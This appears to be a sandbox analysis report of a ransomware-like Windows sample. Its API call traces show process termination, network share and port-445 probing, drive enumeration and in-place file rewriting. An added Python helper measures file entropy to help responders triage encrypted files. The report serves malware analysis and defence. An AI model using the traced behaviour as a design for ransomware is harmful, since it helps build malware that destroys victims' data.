      • SystemTimeToFileTime.KERNEL32(?,00000000,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7853
      • QueryPerformanceCounter.KERNEL32(000D17C2,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D786F
      • LeaveCriticalSection.KERNEL32(000DD6A0,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7899
      Yara matches
      Similarity
      • API ID: CriticalSectionTime$CountCounterCurrentPerformanceQuery$EnterFileInitializeLeaveLocalProcessSpinSystemThreadTick
      • String ID:
      • API String ID: 1260023459-0
      • Opcode ID: 4a7b0c366028093d0c0d68e5d9b62ae32c8110a0db55761aa8c765e5906233fc
      • Instruction ID: 355109d011f7d89fef0b5c52415464b6a59f5861aee495031de9f0a09d26803f
      • Opcode Fuzzy Hash: 4a7b0c366028093d0c0d68e5d9b62ae32c8110a0db55761aa8c765e5906233fc
      • Instruction Fuzzy Hash: 4411D6719022089FEB00DBB4ED49A8E7BF8FF0D301B420427E90AD2160D73C95449FB2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000D4E00
      • Process32FirstW.KERNEL32(Q#,?), ref: 000D4E38
      • OpenProcess.KERNEL32(00000001,00000000,?,00000000,?,?,?), ref: 000D4E68
      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 000D4E76
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 000D4E7F
      • Process32NextW.KERNEL32(?,?), ref: 000D4E8E
      • CloseHandle.KERNEL32(?,?,?,?), ref: 000D4E9C
      Strings
      Yara matches
      Similarity
      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
      • String ID: Q#
      • API String ID: 2696918072-1378326089
      • Opcode ID: 0b102eba9774613decf4c896ba4290ecd8c6b0146ce1b98ea5c619e7cb8e0e3f
      • Instruction ID: a7bb75f8bf3fd45934336a42514615251fa5a267a41b88873bbfb8bd6af0cf85
      • Opcode Fuzzy Hash: 0b102eba9774613decf4c896ba4290ecd8c6b0146ce1b98ea5c619e7cb8e0e3f
      • Instruction Fuzzy Hash: 9A115175A01319BFDB10ABA5DC88ADEBBBCEF49714F1000A6E904E2250D7749E45CAB1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • WNetOpenEnumW.MPR(00000000,00000000,00000000,00000000,?), ref: 000D1E66
      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 000D1E83
        • Part of subcall function 000D5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,000D2E54), ref: 000D596A
        • Part of subcall function 000D5962: LeaveCriticalSection.KERNEL32(?), ref: 000D5973
      • WNetEnumResourceW.MPR(?,?,?,?), ref: 000D2046
      • WNetCloseEnum.MPR(?), ref: 000D205E
      Strings
      Yara matches
      Similarity
      • API ID: Enum$CriticalHeapResourceSection$AllocCloseEnterLeaveOpenProcess
      • String ID: \\?\UNC\\\e-
      • API String ID: 3929263231-4184602625
      • Opcode ID: ae07674ea611144740b074433ef4f2a9b66b7ff096b47961c587cac15d84ca79
      • Instruction ID: 0cde50cece935838c0b8be18b043e76bf27a4f3a46bdaf6fbabf3ee7c3cd90e0
      • Opcode Fuzzy Hash: ae07674ea611144740b074433ef4f2a9b66b7ff096b47961c587cac15d84ca79
      • Instruction Fuzzy Hash: 4D61DF72204301AFDB21AF24DC45AAB7BE9EF94310F04092AF954D6363EB31D955CB72
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • MoveFileW.KERNEL32(?,?), ref: 000D8CD3
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 000D8CF1
      • SetFilePointerEx.KERNEL32(00000001,?,?,?,00000002), ref: 000D8E3F
      • WriteFile.KERNEL32(00000001,?,?,?,00000000), ref: 000D8E59
      • SetEndOfFile.KERNEL32(00000001), ref: 000D8E6F
        • Part of subcall function 000D8AF1: SetFilePointerEx.KERNEL32(?,00000000,?,?,00000000), ref: 000D8B28
        • Part of subcall function 000D8AF1: WriteFile.KERNEL32(?,?,00040000,?,00000000), ref: 000D8B3F
      • FlushFileBuffers.KERNEL32(00000001), ref: 000D8E8E
      • CloseHandle.KERNEL32(?), ref: 000D8E9E
      • MoveFileW.KERNEL32(?,?), ref: 000D8EB0
      Yara matches
      Similarity
      • API ID: File$MovePointerWrite$BuffersCloseCreateFlushHandle
      • String ID:
      • API String ID: 4283038262-0
      • Opcode ID: 004537327b5b9e0a33982c82c9cee4f1a8d0ea6783c3b9766819a184d91acb42
      • Instruction ID: 7e091922901eec9f906959c782a6ca85cc82641d998ab4966ad8ba2c24ce3517
      • Opcode Fuzzy Hash: 004537327b5b9e0a33982c82c9cee4f1a8d0ea6783c3b9766819a184d91acb42
      • Instruction Fuzzy Hash: 2B716DB1A00309AFDF119FA4DC45BEE7BB9BF08300F04852AF905E6251EB75AA54CF61
      Uniqueness

      Uniqueness Score: -1.00%
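The function above renames the target with MoveFileW, reopens it with GENERIC_READ | GENERIC_WRITE (C0000000) and OPEN_EXISTING (3), seeks relative to FILE_END (dwMoveMethod 2), writes, truncates with SetEndOfFile, flushes, closes and renames once more; the subcall at 000D8AF1 seeks and writes 0x40000-byte (256 KiB) blocks. That is an in-place rewrite with data appended at the end, which is what the report's "Writes many files with high entropy" signature is measuring. The Python below is an added triage helper, not code from the report or from Joe Sandbox: it profiles a file's Shannon entropy in the same 256 KiB windows so a responder can separate files that were rewritten end to end from files with plaintext regions left behind, and can see a short appended tail as a separate entry. The window size comes from the trace; the sample buffers are constructed (os.urandom stands in for ciphertext) and the 7.5 bit/byte threshold is a working assumption.

```python
import math
import os
from collections import Counter

CHUNK = 0x40000      # 256 KiB: the WriteFile length in subcall 000D8AF1
MIN_SAMPLE = 4096    # shorter tails are skipped: log2(len) caps their entropy
THRESHOLD = 7.5      # bits per byte; ciphertext and compressed data sit near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def _verdict(flags):
    if not flags:
        return "too-small"
    if all(flags):
        return "encrypted-like"
    if not any(flags):
        return "plaintext-like"
    return "partially-encrypted"


def chunk_profile(data: bytes, chunk: int = CHUNK):
    """(offset, length, entropy) for every chunk-sized window of a buffer."""
    return [(i, len(data[i:i + chunk]), shannon_entropy(data[i:i + chunk]))
            for i in range(0, len(data), chunk)]


def classify(data: bytes, chunk: int = CHUNK, threshold: float = THRESHOLD) -> str:
    """Whole-buffer verdict from per-chunk entropy; tails under MIN_SAMPLE are ignored."""
    flags = [e >= threshold for _, n, e in chunk_profile(data, chunk) if n >= MIN_SAMPLE]
    return _verdict(flags)


def scan_file(path: str, chunk: int = CHUNK, threshold: float = THRESHOLD):
    """Streaming version for real files: returns (verdict, profile) without
    loading the whole file. A short final entry is where to look for data
    that was appended after a seek to FILE_END."""
    profile, flags, offset = [], [], 0
    with open(path, "rb") as f:
        while block := f.read(chunk):
            e = shannon_entropy(block)
            profile.append((offset, len(block), e))
            if len(block) >= MIN_SAMPLE:
                flags.append(e >= threshold)
            offset += len(block)
    return _verdict(flags), profile


def build_samples():
    """Constructed inputs: repetitive English text versus os.urandom as a
    stand-in for ciphertext (no real encrypted sample is embedded)."""
    text = (b"The quick brown fox jumps over the lazy dog. " * 6000)[:CHUNK]
    return {
        "plaintext": text * 2,
        "encrypted": os.urandom(2 * CHUNK) + os.urandom(512),   # 512-byte tail is profiled, not judged
        "partial": text + os.urandom(CHUNK),
    }


if __name__ == "__main__":
    for name, data in build_samples().items():
        ents = ", ".join(f"{e:.2f}" for _, _, e in chunk_profile(data))
        print(f"{name:10s} {classify(data):20s} chunk entropies: {ents}")
```

Entropy alone cannot tell ciphertext from compressed content (ZIP, JPEG, PDF streams), so treat "encrypted-like" on an originally compressed format as expected; the stronger signal is a file whose extension or header no longer matches its content, or a "partially-encrypted" profile on a large file.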

      APIs
      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8ED8
      • GetFileSizeEx.KERNEL32(00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8EEE
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8EFD
      • GetFileAttributesW.KERNEL32(?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8F1B
      • SetFileAttributesW.KERNEL32(?,00000000,?,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8F3C
        • Part of subcall function 000D8782: GetFileAttributesW.KERNEL32(?), ref: 000D87F3
        • Part of subcall function 000D8782: GetFileAttributesW.KERNEL32(?), ref: 000D8816
        • Part of subcall function 000D8782: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 000D8835
        • Part of subcall function 000D8782: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 000D885C
        • Part of subcall function 000D8782: SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000D888C
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 000D8F8F
      • SetFileAttributesW.KERNEL32(?,?,00000000,00000000), ref: 000D8F94
      • CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000D8F9C
      Yara matches
      Similarity
      • API ID: File$Attributes$CloseCreateHandlePointer$Size
      • String ID:
      • API String ID: 3440144462-0
      • Opcode ID: 3bbb344b81a1ca0b926ee004335d0bdd80088eb67b8b87857666c885bf8fd416
      • Instruction ID: 5721a372e2af54763c91a378066009306fe1e5248dd4c71123b1c1454d85aa21
      • Opcode Fuzzy Hash: 3bbb344b81a1ca0b926ee004335d0bdd80088eb67b8b87857666c885bf8fd416
      • Instruction Fuzzy Hash: 62314D70A01309BFDF159FA4DC84ABE7BB9EF05320F14852AF925A2390DB348E549B71
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,000D2C15), ref: 000D2444
      • CreateThread.KERNEL32(00000000,00000000,000D454B,00000000,00000000,00000000), ref: 000D245A
        • Part of subcall function 000D4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,000D2C6F,00000001), ref: 000D4F95
        • Part of subcall function 000D4F7A: CloseHandle.KERNEL32(?,?,000D2C6F,00000001), ref: 000D4F9E
      • Sleep.KERNEL32(00000064), ref: 000D2472
      • SetEvent.KERNEL32(00000000), ref: 000D2486
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D2495
      • GetExitCodeThread.KERNEL32(?,?), ref: 000D24A4
      • CloseHandle.KERNEL32(00000000), ref: 000D24B1
      • CloseHandle.KERNEL32(?), ref: 000D24B8
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateEventThread$CodeExitMutexObjectReleaseSingleSleepWait
      • String ID:
      • API String ID: 2313513115-0
      • Opcode ID: 03bfa00229dd38d6eaee87d83a3a014705709ca548860397d17a5c08f125d407
      • Instruction ID: 455383f840d22e675490a244de09cf6fe0522e65c91d97d46caae728f2fa24eb
      • Opcode Fuzzy Hash: 03bfa00229dd38d6eaee87d83a3a014705709ca548860397d17a5c08f125d407
      • Instruction Fuzzy Hash: 8511C435A01314BBE720ABA69C88EAFBFBCEBC6B51F104157FD11A2290D7784900CA71
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LeaveCriticalSection.KERNEL32(000D1D91,?,000D1D81,00000000,?,?,?,?), ref: 000D5387
      • WaitForSingleObject.KERNEL32(74FF2274,000000FF,?,000D1D81,00000000,?,?,?,?), ref: 000D5392
      • EnterCriticalSection.KERNEL32(000D1D91,000D1D81,00000000,00000000,000D58E8,?,?,00000000,?,?,000D1D81,00000000,?,?,?,?), ref: 000D539D
      • ResetEvent.KERNEL32(77FF1024,?,000D1D81,00000000,?,?,?,?), ref: 000D53B3
      • ResetEvent.KERNEL32(2474FF22,?,000D1D81,00000000,?,?,?,?), ref: 000D53CA
      • LeaveCriticalSection.KERNEL32(000D1D91,?,000D1D81,00000000,?,?,?,?), ref: 000D53D9
      Yara matches
      Similarity
      • API ID: CriticalSection$EventLeaveReset$EnterObjectSingleWait
      • String ID:
      • API String ID: 622437971-0
      • Opcode ID: b1124421c609ecd7e2045fdfa1d3d8ea6e9dae74d8c26cefc9df4a43312a5361
      • Instruction ID: c8ed6d61d34f73806a295243dbb2cc6d9e15dc9a613be5f0689af519032a10bd
      • Opcode Fuzzy Hash: b1124421c609ecd7e2045fdfa1d3d8ea6e9dae74d8c26cefc9df4a43312a5361
      • Instruction Fuzzy Hash: 02011A71201B119BE7205B29DD40916BBF9EF117A23214A2BECA6D2660D7B4ED019BB1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • GetIpAddrTable.IPHLPAPI(00000000,?,00000000), ref: 000D525F
      • htonl.WS2_32(00000004), ref: 000D527C
      • htonl.WS2_32(00000004), ref: 000D5287
      • htonl.WS2_32(?), ref: 000D528E
        • Part of subcall function 000D5067: htons.WS2_32(000001BD), ref: 000D5085
        • Part of subcall function 000D5067: htonl.WS2_32(00000000), ref: 000D50DB
        • Part of subcall function 000D5067: socket.WS2_32(00000002,00000001,00000006), ref: 000D50EC
        • Part of subcall function 000D5067: ioctlsocket.WS2_32(00000000,8004667E,?), ref: 000D5102
        • Part of subcall function 000D5067: connect.WS2_32(00000000,?,00000010), ref: 000D5113
        • Part of subcall function 000D5067: WSAGetLastError.WS2_32 ref: 000D511D
        • Part of subcall function 000D5067: getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 000D517C
        • Part of subcall function 000D5067: recv.WS2_32(?,?,00000001,00000002), ref: 000D5195
        • Part of subcall function 000D5067: WSAGetLastError.WS2_32 ref: 000D51A2
        • Part of subcall function 000D5067: getpeername.WS2_32(?,?,?), ref: 000D51C9
        • Part of subcall function 000D5067: closesocket.WS2_32(?), ref: 000D51E3
      Strings
      Yara matches
      Similarity
      • API ID: htonl$ErrorHeapLast$AddrAllocProcessTableclosesocketconnectgetpeernamegetsockopthtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1223028931-2013044058
      • Opcode ID: 5711ba3b6bd537a845fff8e22635db1505d6c0d68f3b52569e02f127f21bfa49
      • Instruction ID: b939c7def060381adabdeca3a4df326f25bf67156da30742d63f41c98f7eec33
      • Opcode Fuzzy Hash: 5711ba3b6bd537a845fff8e22635db1505d6c0d68f3b52569e02f127f21bfa49
      • Instruction Fuzzy Hash: C411D071600315AFDB10AF68CC858AABBE8FB49356F10092BF888C2312D635D959CBF1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,000D339F), ref: 000D32AB
      • DeleteCriticalSection.KERNEL32(0000000C,?,000D339F), ref: 000D32B2
      • CloseHandle.KERNEL32(00000000,?,000D339F), ref: 000D32C5
      • CloseHandle.KERNEL32(?,?,000D339F), ref: 000D32CF
      • CloseHandle.KERNEL32(?,?,000D339F), ref: 000D32D9
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$DeleteEnter
      • String ID:
      • API String ID: 622934417-0
      • Opcode ID: 59dd3b46073556fe3fc074a678ac42059a8bab9b59674b2c41514448120ec279
      • Instruction ID: 12d09391e1a4c5ad6ab1c9cfc604e29b0c621c60d4209d3432d0ce26f549633d
      • Opcode Fuzzy Hash: 59dd3b46073556fe3fc074a678ac42059a8bab9b59674b2c41514448120ec279
      • Instruction Fuzzy Hash: 4AF03A327003005FA6A0AB69EC8993BB7ECAF95B10315080FF845D3651DB69F9428A72
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(0000000C,?,00000000,000D57AF), ref: 000D33CB
      • SetEvent.KERNEL32(?), ref: 000D33DE
      • SetEvent.KERNEL32(00000000), ref: 000D33E2
      • SetEvent.KERNEL32(?), ref: 000D33E7
      • LeaveCriticalSection.KERNEL32(0000000C), ref: 000D33EA
      Yara matches
      Similarity
      • API ID: Event$CriticalSection$EnterLeave
      • String ID:
      • API String ID: 259983309-0
      • Opcode ID: 4fbb3b2c1ea517a1e4772d7781886224b7be0be994eb9c3d54c003075aab16b3
      • Instruction ID: b0a7a79785e39e8b89b554fab747d7664e41b2657bac6c25351ea144d03e05f0
      • Opcode Fuzzy Hash: 4fbb3b2c1ea517a1e4772d7781886224b7be0be994eb9c3d54c003075aab16b3
      • Instruction Fuzzy Hash: 6ED01776201604EFE7206B62EC88C4B7FAAEFC93613118819E49741430C736A818DF32
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
      • GetLogicalDrives.KERNEL32 ref: 000D1015
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      Strings
      Yara matches
      Similarity
      • API ID: Heap$AllocDrivesInformationLogicalProcessVolume
      • String ID: X:\$i.$i.
      • API String ID: 2665412759-4186527012
      • Opcode ID: 78d8ea63dd5d00ddc9d23516aff900f51495abb0f19daf6da7b9178f348bad94
      • Instruction ID: b5b12b068af5ae94e33cd28aa26df5c820ea4a93e15ab0bcc65461cc00cd1d49
      • Opcode Fuzzy Hash: 78d8ea63dd5d00ddc9d23516aff900f51495abb0f19daf6da7b9178f348bad94
      • Instruction Fuzzy Hash: 29611A75D00309AADF15ABA4ED46BEEBBB5AF04310F24002BF500B6292DF759E90DB71
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D4147
      • GetProcAddress.KERNEL32(00000000), ref: 000D414E
      • CoGetObject.OLE32(?,?,000DA1F0,?), ref: 000D41A1
      Strings
      Similarity
      • API ID: AddressHandleModuleObjectProc
      • String ID: $

      APIs
      • GetLogicalDrives.KERNEL32 ref: 000D1A82
        • Part of subcall function 000D530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
        • Part of subcall function 000D5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,000D2E54), ref: 000D596A
        • Part of subcall function 000D5962: LeaveCriticalSection.KERNEL32(?), ref: 000D5973
        • Part of subcall function 000D1706: htonl.WS2_32(?), ref: 000D1774
        • Part of subcall function 000D5840: CreateThread.KERNEL32(00000000,00000000,000D56B3,00000000,00000000,00000000), ref: 000D58F2
      • CloseHandle.KERNEL32(00000000), ref: 000D1B37
      • CloseHandle.KERNEL32(00000000), ref: 000D1B6B
      Similarity
      • API ID: CreateCriticalSection$CloseEventHandle$CountDrivesEnterInformationInitializeLeaveLogicalSpinThreadVolumehtonl
      • String ID: \\?\X:

      APIs
      • GetLogicalDrives.KERNEL32 ref: 000D1CD1
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
        • Part of subcall function 000D530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
        • Part of subcall function 000D5962: EnterCriticalSection.KERNEL32(?,00000000,00000000,000D2E54), ref: 000D596A
        • Part of subcall function 000D5962: LeaveCriticalSection.KERNEL32(?), ref: 000D5973
      • GetLogicalDrives.KERNEL32 ref: 000D1D33
      • Sleep.KERNEL32(000003E8), ref: 000D1DC3
      Similarity
      • API ID: CriticalSection$CreateDrivesEventLogical$CountEnterInformationInitializeLeaveSleepSpinVolume
      • String ID: \\?\ :

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
        • Part of subcall function 000D5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D5B3B,00000000,00000000,00000000,000D37EB,00000000), ref: 000D5B19
      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 000D4908
      • CloseHandle.KERNEL32(?), ref: 000D491E
      • CloseHandle.KERNEL32(?), ref: 000D4923
      Similarity
      • API ID: Handle$CloseHeapModuleProcess$AddressAllocCreateFileNameProc
      • String ID: D

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
      Similarity
      • API ID: CreateEventHeap$AllocCountCriticalInitializeProcessSectionSpin
      • String ID: \\?\ :

      APIs
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,000DA208,00000104,?,i.,000D11AD,?,?), ref: 000D397F
      • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000D3996
      • CloseHandle.KERNEL32(00000000), ref: 000D39AB
      Similarity
      • API ID: File$CloseCreateHandleWrite
      • String ID: i.

      APIs
        • Part of subcall function 000D32FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,000D56C4), ref: 000D331E
        • Part of subcall function 000D32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3371
        • Part of subcall function 000D32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D337B
        • Part of subcall function 000D32FF: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3386
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
      • CreateThread.KERNEL32(00000000,00000001,000D54BF,?,00000000,00000000), ref: 000D5746
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D57A4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 000D57B9
      • CloseHandle.KERNEL32(?), ref: 000D57CB
      Similarity
      • API ID: Create$Event$HandleHeapWait$AddressAllocCloseCountCriticalInitializeModuleMultipleObjectObjectsProcProcessSectionSingleSpinThread
      • String ID:

      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 000D8B7C
      • __aulldiv.LIBCMT ref: 000D8BAB
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000000,?,?,00000003,00000000), ref: 000D8BE9
      • ReadFile.KERNEL32(?,?,00040000,?,00000000), ref: 000D8C0E
      Similarity
      • API ID: File$Pointer$Read__aulldiv
      • String ID:

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,?), ref: 000D37A7
      • AllocConsole.KERNEL32 ref: 000D37C0
      • GetStdHandle.KERNEL32(000000F5), ref: 000D37C8
      • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 000D381C
        • Part of subcall function 000D90A1: GetProcessHeap.KERNEL32(00000000,000D633F,000D62A2,00000000,00000010,00000000,00000020,000D633F,00000040,000D2A6F,000DB410), ref: 000D90A7
        • Part of subcall function 000D90A1: HeapFree.KERNEL32(00000000), ref: 000D90AE
      Similarity
      • API ID: Heap$AllocProcess$ConsoleCountCreateCriticalFileFreeHandleInitializeSectionSpin
      • String ID:

      APIs
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 000D86EA
      • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 000D8713
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8737
      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8766
      Similarity
      • API ID: File$PointerWrite
      • String ID:

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0,?,?,000D56C4), ref: 000D331E
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3371
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D337B
      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D3386
      Similarity
      • API ID: CreateEvent$Heap$AllocCountCriticalInitializeProcessSectionSpin
      • String ID:

      APIs
      Similarity
      • API ID: CountTick$select
      • String ID:

      APIs
      • CreateThread.KERNEL32(00000000,00000000,000D4B85,00000000,00000000,00000000), ref: 000D4D8A
      • WaitForSingleObject.KERNEL32(00000000,00000000,?,000D4DDD,00000000,00000000,?,00000000,?,000D2C9F,0000002C), ref: 000D4D98
      • GetExitCodeThread.KERNEL32(00000000,?,?,000D4DDD,00000000,00000000,?,00000000,?,000D2C9F,0000002C), ref: 000D4DA7
      • CloseHandle.KERNEL32(00000000,?,000D4DDD,00000000,00000000,?,00000000,?,000D2C9F,0000002C), ref: 000D4DB1
      Similarity
      • API ID: Thread$CloseCodeCreateExitHandleObjectSingleWait
      • String ID:

      APIs
      • LeaveCriticalSection.KERNEL32(?), ref: 000D34B9
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D34C3
      • EnterCriticalSection.KERNEL32(?), ref: 000D34CA
        • Part of subcall function 000D33F3: SetEvent.KERNEL32(00000004), ref: 000D3459
        • Part of subcall function 000D33F3: ResetEvent.KERNEL32(00000000), ref: 000D3462
      • LeaveCriticalSection.KERNEL32(?), ref: 000D34DD
      Similarity
      • API ID: CriticalSection$EventLeave$EnterObjectResetSingleWait
      • String ID:

      APIs
      • EnterCriticalSection.KERNEL32(000D1D91,000D1D81,00000000,00000000,000D5906,?,000D1D81,00000000,?,?,?,?), ref: 000D53EE
      • SetEvent.KERNEL32(74FF2274,?,000D1D81,00000000,?,?,?,?), ref: 000D5404
      • SetEvent.KERNEL32(FF102474,?,000D1D81,00000000,?,?,?,?), ref: 000D5416
      • LeaveCriticalSection.KERNEL32(000D1D91,?,000D1D81,00000000,?,?,?,?), ref: 000D541F
      Similarity
      • API ID: CriticalEventSection$EnterLeave
      • String ID:

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D530C: InitializeCriticalSectionAndSpinCount.KERNEL32(00000010,00000FA0,\\?\ :,00000000,000D1D05,00000014,00000000), ref: 000D5327
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?), ref: 000D5347
        • Part of subcall function 000D530C: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 000D5352
      • GetComputerNameW.KERNEL32(00000010,00000008), ref: 000D21D5
      • Sleep.KERNEL32(00002710), ref: 000D2297
      Similarity
      • API ID: CreateEventHeap$AllocComputerCountCriticalInitializeNameProcessSectionSleepSpin
      • String ID: \\?\UNC\\\e-

      APIs
